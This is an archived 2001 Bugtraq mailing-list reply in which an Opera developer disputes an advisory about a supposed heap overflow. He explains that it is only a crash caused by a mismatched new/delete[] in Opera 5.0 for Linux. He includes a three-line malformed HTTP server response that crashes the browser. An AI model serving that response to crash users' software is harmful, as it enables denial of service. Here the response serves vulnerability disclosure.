6750411 2001-07-12 18:43 +0200  /33 rader/ Petter Reinholdtsen <pere@opera.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-16  07:49  av Brevbäraren
Extern mottagare: comments@securiteam.com
Extern kopiemottagare: msarica@bilgiteks.com
Extern kopiemottagare: bugtraq@securifyfocus.com
Mottagare: Bugtraq (import) <17967>
Ärende: Re: Opera Browser Heap Overflow (Session Replay Attack)
------------------------------------------------------------
From: Petter Reinholdtsen <pere@opera.com>
To: comments@securiteam.com
Cc: msarica@bilgiteks.com, bugtraq@securifyfocus.com
Message-ID: <E15KjZ6-0006f5-00@zoot>


A few comments to
<URL:http://www.securiteam.com/securitynews/5MP0B004UW.html>.

The crash is _not_ an unchecked buffer error in Opera 5.12.  It is a
mismatched new/delete[] pair in Opera 5.0 for Linux (and not 5.12 for
windows).

Also, there is no need for long reply lines.  The following reply from
the server will also crash Opera:

  HTTP/1.0 200 OK\r\n
  Connection: X\r\n
  X

As far as I can tell, the received reply is not written into any short
buffer, and it is not possible to format the reply in any way to get
code executed.

There is no security problem, just a plain old crash bug. :-)

Please update the "vulnerability" page as soon as possible.

Copy to the reporter and bugtraq for information.
-- 
##>  Petter Reinholdtsen <##    | pere@opera.com
(6750411) /Petter Reinholdtsen <pere@opera.com>/----